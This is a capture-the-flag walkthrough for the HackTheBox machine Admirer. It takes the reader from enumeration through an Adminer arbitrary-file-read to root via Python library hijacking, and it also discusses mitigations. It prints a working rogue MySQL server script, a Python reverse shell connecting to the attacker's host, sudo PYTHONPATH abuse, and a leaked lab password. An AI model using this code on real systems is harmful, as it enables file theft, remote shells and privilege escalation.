Today we are going to crack a machine called Admirer. It was created by #########. This is a Capture the Flag style challenge hosted on HackTheBox. Let's get cracking!
Penetration Testing Methodology
· Network Scanning
  o Nmap Scan
· Enumeration
  o Browsing HTTP Service
  o Directory Bruteforce using gobuster
  o Enumerating FTP Service
  o Enumerating Backup Files
  o Directory Bruteforce using gobuster
  o Detecting Vulnerable Adminer
· Exploitation
  o Configuring MySQL
  o Creating user and Database in MySQL
  o Connecting the local MySQL with Adminer
  o Running Query for Arbitrary File Disclosure
  o Reading User Flag
· Privilege Escalation
  o Escalating Privilege using Python Library Hijacking
· Reading Root Flag
Walkthrough
Network Scanning
To attack any machine, we need its IP address. Machines hosted on HackTheBox have static IP addresses.
IP Address assigned: 10.129.77.71
Now that we have the IP address, we need to enumerate the open ports on the machine. For this we ran an Nmap scan with version detection (-sV) and the default script set (-sC); the scripts are what pick up details such as a robots.txt file.
nmap -sC -sV 10.129.77.71
The scan quickly gave us some useful information. It reported the following ports and services: 21 (FTP), 22 (SSH) and 80 (HTTP). The http-robots.txt script also found a robots.txt file on the web server with one disallowed entry, /admin-dir.
Enumeration
We started our enumeration with the HTTP service. We opened the machine's IP address in the browser and got a webpage with some images. Clicking an image enlarges it and shows some text. There is a Contact Us form as well, but the page is mostly aesthetic; nothing seems to be functional.
http://10.129.77.71
We went back to the Nmap scan performed earlier and tried to access the /admin-dir directory that the robots.txt file on the target had disclosed.
http://10.129.77.71/admin-dir/
At this point we usually perform a directory bruteforce, and we used gobuster for that. We tried multiple dictionaries; big.txt together with the .txt extension gave results, as shown in the image.
gobuster dir -u http://10.129.77.71/admin-dir/ -w /usr/share/wordlists/dirb/big.txt -x .txt
Gobuster found two files, contacts.txt and credentials.txt. Let's check credentials.txt first. It contains credentials for the FTP service.
http://10.129.77.71/admin-dir/credentials.txt
We logged in to the FTP server with those credentials. Listing its contents showed a dump.sql database dump and an html.tar.gz archive. We downloaded both to our local system with the get command and first extracted html.tar.gz.
A close inspection of the extracted files shows that it is a backup of the website's source code. While going through it in the hope of finding credentials, we came across a directory named utility-scripts/.
Since this is a backup, the directory may exist on the live site as well. We tried to access /utility-scripts/ on the server and received a 403 Forbidden, which means the directory exists but we are not allowed to list it. So we examined its files in the backup instead. phptest.php simply prints "Just a test to see if PHP works." info.php reports the PHP version and the location of the site on disk. Then there is admin_tasks.php, which offers a list of administrative tasks that execute commands on the system. As we saw, the directory itself is forbidden, but that does not mean every file inside it is, so we ran another directory bruteforce against it with the .php extension in the hope of finding a file that is reachable on the live server.
gobuster dir -u http://10.129.77.71/utility-scripts/ -w /usr/share/wordlists/dirb/big.txt -x .php
The gobuster scan was a success: it found /adminer.php with a 200 OK status, so this file is not forbidden. We opened it and found that it is Adminer, a web-based MySQL database management tool. The version is printed on the login page. Time to enumerate it.
http://10.129.77.71/utility-scripts/adminer.php
There was no need for a deep search; a basic Google search gave a step-by-step method to exploit this Adminer version.
Reference: Foregenix Blog
The weakness Adminer suffers from is generally called Arbitrary File Disclosure. Categorised according to the OWASP Top 10 (2017), it falls under Sensitive Data Exposure. Adminer is a MySQL client running on the web server, and it connects to whatever database server the user types into the login form. A malicious MySQL server can answer the client's first query with a LOAD DATA LOCAL INFILE request for a file of its own choosing, and the client then reads that file from the web server's disk and sends its contents to the server. An attacker can use this to fetch configuration files holding the database passwords of any CMS installed on the site, and from there gain full access to the database.
Exploitation
To exploit this, we need a MySQL server of our own on Kali Linux that the target's Adminer will connect to, plus a table to receive the file contents. Here we already have a MariaDB server installed. After starting it we log in as root, create a user raaj, grant it all privileges and flush privileges. Then we create a database named after the target machine, admirer, and inside it a table demo with a single column name. After that we exit the MySQL shell.
systemctl start mysql
mysql -u root -p
CREATE USER 'raaj'@'%' IDENTIFIED BY 'password';
GRANT ALL PRIVILEGES ON *.* TO 'raaj'@'%';
FLUSH PRIVILEGES;
create database admirer;
use admirer;
create table demo(name varchar(255));
exit
If you have a firewall policy in place, amend it so that the target can reach port 3306 on your machine. MariaDB also listens only on 127.0.0.1 by default, so the bind-address setting in the server configuration under /etc/mysql has to be changed so that the server listens on the VPN interface (for example bind-address = 0.0.0.0).
nano /etc/mysql/mariadb.conf.d/50-server.cnf
Now that all is set, we restart MySQL and head to the Adminer page. As the server we enter the IP address assigned to our Kali machine by the HTB VPN, together with the user raaj, the password we set and admirer as the database name.
After logging in, it's time to pull data from the target into our newly created table with a LOAD DATA LOCAL INFILE query. Although we type the query into Adminer, the MySQL client that executes it is Adminer itself, running on the target as www-data, so any file www-data can read can be sent to our server. info.php in the backup already told us where the live site lives on disk, and the path in the query is resolved relative to the utility-scripts directory Adminer runs from, so ../index.php is the index page of the live site.
load data local infile '../index.php'
into table demo
fields terminated by "\n"
Running the query fills the demo table with the contents of index.php, and among them we find the database credentials of the user waldo, as shown in the image below:
Username: waldo
Password: &<h5b~yK3F#{PaPB&dA}{H>
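What happens on the wire during that query, as an added example (my own code, not the walkthrough's MariaDB setup and not Foregenix's or Adminer's code): a minimal rogue MySQL server that accepts any credentials, answers the client's first query with a LOAD DATA LOCAL INFILE request for a path of its choosing, and collects the bytes the client uploads. The point it makes is that the server, not the client, names the file; a real MariaDB does the same when asked to, which is why the walkthrough gets away with a stock install. It assumes the connecting client advertises CLIENT_LOCAL_FILES and accepts a protocol-10 handshake without an authentication plugin; the function names, the file-like I/O interface and the port 3307 in the usage comment are mine.

```python
"""Minimal rogue MySQL server for the LOAD DATA LOCAL INFILE file-read trick.

Added example. Assumes the client (the target's Adminer) sets CLIENT_LOCAL_FILES
and honours a server-initiated LOCAL INFILE request for an arbitrary path.
"""
import socket
import struct

CLIENT_LOCAL_FILES = 0x0080        # client will upload files on request
CLIENT_PROTOCOL_41 = 0x0200
CLIENT_SECURE_CONNECTION = 0x8000


def packet(payload: bytes, seq: int) -> bytes:
    """Frame a payload as a MySQL packet: 3-byte LE length, 1-byte sequence id."""
    return struct.pack("<I", len(payload))[:3] + bytes([seq & 0xFF]) + payload


def read_packet(rfile):
    """Read one packet from a binary file object; returns (seq, payload)."""
    header = rfile.read(4)
    if len(header) < 4:
        raise EOFError("client closed the connection")
    length = int.from_bytes(header[:3], "little")
    return header[3], rfile.read(length)


def greeting(server_version: bytes = b"5.7.31-rogue") -> bytes:
    """Protocol-10 handshake that advertises CLIENT_LOCAL_FILES (no auth plugin)."""
    caps = CLIENT_LOCAL_FILES | CLIENT_PROTOCOL_41 | CLIENT_SECURE_CONNECTION
    return (
        b"\x0a" + server_version + b"\x00"
        + struct.pack("<I", 1)            # connection id
        + b"A" * 8 + b"\x00"              # auth-plugin-data part 1 + filler
        + struct.pack("<H", caps & 0xFFFF)
        + b"\x21"                         # character set utf8_general_ci
        + struct.pack("<H", 0x0002)       # SERVER_STATUS_AUTOCOMMIT
        + struct.pack("<H", caps >> 16)
        + b"\x00"                         # filler (no CLIENT_PLUGIN_AUTH)
        + b"\x00" * 10                    # reserved
        + b"B" * 12 + b"\x00"             # auth-plugin-data part 2 (13 bytes)
    )


def ok_packet() -> bytes:
    """OK: header 0x00, affected rows 0, last insert id 0, status, warnings."""
    return b"\x00\x00\x00" + struct.pack("<HH", 0x0002, 0)


def local_infile_request(path: str) -> bytes:
    """Answer to any COM_QUERY: 0xFB + filename makes the client upload that file."""
    return b"\xfb" + path.encode()


def handle_connection(rfile, wfile, path: str) -> bytes:
    """Run the rogue handshake on one connection; return the file the client sent."""
    wfile.write(packet(greeting(), 0)); wfile.flush()
    read_packet(rfile)                      # HandshakeResponse41: credentials ignored
    wfile.write(packet(ok_packet(), 2)); wfile.flush()
    seq, query = read_packet(rfile)         # first command, normally COM_QUERY (0x03)
    if not query or query[0] != 0x03:
        raise ValueError("expected COM_QUERY, got %r" % query[:1])
    wfile.write(packet(local_infile_request(path), seq + 1)); wfile.flush()
    chunks = []
    while True:
        seq, data = read_packet(rfile)
        if not data:                        # an empty packet ends the upload
            break
        chunks.append(data)
    wfile.write(packet(ok_packet(), seq + 1)); wfile.flush()
    return b"".join(chunks)


def serve(bind_addr: str, port: int, path: str) -> bytes:
    """Accept one client on bind_addr:port and return the requested file's bytes."""
    with socket.create_server((bind_addr, port)) as srv:
        conn, _peer = srv.accept()
        with conn, conn.makefile("rb") as r, conn.makefile("wb") as w:
            return handle_connection(r, w, path)


if __name__ == "__main__":
    import sys
    # e.g. python3 rogue_mysql.py 10.10.14.52 3307 ../index.php
    sys.stdout.buffer.write(serve(sys.argv[1], int(sys.argv[2]), sys.argv[3]))
```

Run it on the Kali side, enter its address and port as the server in Adminer's login form, and any query typed into Adminer makes the target upload the requested file. The defensive check is on the client: PHP's mysqlnd only honours the 0xFB request when mysqli.allow_local_infile is on, which is off by default in current PHP releases, so a hardened deployment never sends the file.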
Using this set of newly found credentials
for the user waldo, we tried to ssh into the target machine.
Privilege Escalation
After logging in, we start enumerating for privilege escalation. We ran sudo -l to list the commands we may run with sudo. It shows /opt/scripts/admin_tasks.sh tagged with SETENV. SETENV is not a binary but a sudoers tag: it lets the user set environment variables on the command line and have sudo pass them through to the command, which is the detail we will exploit. To proceed we need to look at admin_tasks.sh itself. Listing /opt/scripts/ shows that there is a backup.py script alongside it.
backup.py imports make_archive from the shutil library and archives the contents of /var/www/html/ into /var/backups/html. Combining the SETENV permission with that import gives us a way to root: Python searches the directories listed in PYTHONPATH before the standard library, so if we supply a directory of our own containing a shutil.py with a reverse shell, root's Python will import and execute our file when admin_tasks.sh runs backup.py. We can also read the user flag at this point.
cat backup.py
cat /home/waldo/user.txt
mkdir /tmp/raj
nano /tmp/raj/shutil.py
Now that we have created shutil.py in the tmp directory, we fill it with the reverse shell shown below. The code sits at module level, so it runs the moment the module is imported, before backup.py ever calls make_archive.
# /tmp/raj/shutil.py - shadows the standard library's shutil; executed on import
import socket,subprocess,os,pty
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.52",4444))  # our HTB VPN address and listener port
os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2)
pty.spawn("/bin/bash")
Next, we run admin_tasks.sh through sudo with PYTHONPATH set to /tmp/raj, so that root's Python looks in our directory first and picks up our shutil.py. From the script's menu we choose the web backup task, which runs backup.py and so triggers the import. Before doing this, make sure a listener is running on the port used in the payload, so that the session has somewhere to land when it is created.
sudo PYTHONPATH=/tmp/raj /opt/scripts/admin_tasks.sh
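The same hijack reproduced locally without sudo, as an added example (my own code, not the box's scripts and not the walkthrough's payload): a planted shutil.py that records it was imported and then hands over to the genuine shutil so the victim's make_archive call still succeeds, run once with PYTHONPATH pointing at the planted directory and once under python -E, which ignores PYTHON* variables. The victim one-liner standing in for backup.py, the HIJACK_MARK variable and all function names are mine; the marker file takes the place of the reverse shell.

```python
"""PYTHONPATH library hijacking, the weakness backup.py on Admirer exposes.

Added example, not the box's own scripts. Assumes a victim script that does
`from shutil import make_archive` and is run with an attacker-controlled
PYTHONPATH (what sudo's SETENV tag permits). The planted shutil.py writes a
marker file instead of spawning a shell, then re-exports the real shutil.
"""
import os
import subprocess
import sys
import tempfile

# Constructed stand-in for /opt/scripts/backup.py: same import, then reports
# which shutil it ended up with.
VICTIM = "from shutil import make_archive; import shutil; print(shutil.__file__)"

# Constructed payload for <dir>/shutil.py. HIJACK_MARK is an environment
# variable invented for this example; it names the file written in place of a shell.
PAYLOAD = r'''
import os, sys
with open(os.environ["HIJACK_MARK"], "w") as f:
    f.write("shutil.py imported by uid %d\n" % os.getuid())
# Remove our own directory from the search path and load the genuine shutil,
# so make_archive and the rest of the API still exist for the caller.
_here = os.path.dirname(os.path.abspath(__file__))
sys.path[:] = [p for p in sys.path if os.path.abspath(p or os.getcwd()) != _here]
del sys.modules["shutil"]
from shutil import *             # noqa: re-export the real module's API
from shutil import make_archive  # noqa: the one name backup.py needs
'''


def plant(directory: str) -> str:
    """Write the fake shutil.py into directory (the /tmp/raj of the walkthrough)."""
    path = os.path.join(directory, "shutil.py")
    with open(path, "w") as f:
        f.write(PAYLOAD)
    return path


def run_victim(pythonpath: str, marker: str, isolate: bool = False) -> dict:
    """Run VICTIM with PYTHONPATH set, the non-sudo analogue of
    `sudo PYTHONPATH=/tmp/raj /opt/scripts/admin_tasks.sh`.

    isolate=True adds `python -E`, which ignores PYTHON* variables: the
    mitigation beside the attack (the sudoers-level fix is dropping SETENV).
    Returns which shutil loaded and whether the payload ran.
    """
    env = dict(os.environ, PYTHONPATH=pythonpath, HIJACK_MARK=marker)
    cmd = [sys.executable] + (["-E"] if isolate else []) + ["-c", VICTIM]
    proc = subprocess.run(cmd, env=env, capture_output=True, text=True, check=True)
    return {"shutil_file": proc.stdout.strip(), "payload_ran": os.path.exists(marker)}


def demo() -> dict:
    """Plant the module, then run the victim hijacked and isolated."""
    with tempfile.TemporaryDirectory() as d:
        plant(d)
        hijacked = run_victim(d, os.path.join(d, "mark.hijacked"))
        isolated = run_victim(d, os.path.join(d, "mark.isolated"), isolate=True)
        return {"hijacked": hijacked, "isolated": isolated}


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

The first run executes the planted module as whatever user launched the interpreter; on the box that is root, because sudo kept PYTHONPATH. The second run never touches it, which is why a script meant to run under sudo should either be invoked with -E or -I, or, better, the sudoers rule should not carry SETENV at all.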
Without much delay, the listener we started earlier receives a root shell on the target machine. After reading the root flag we can conclude this CTF challenge.
nc -lvp 4444
cd /root
ls
cat root.txt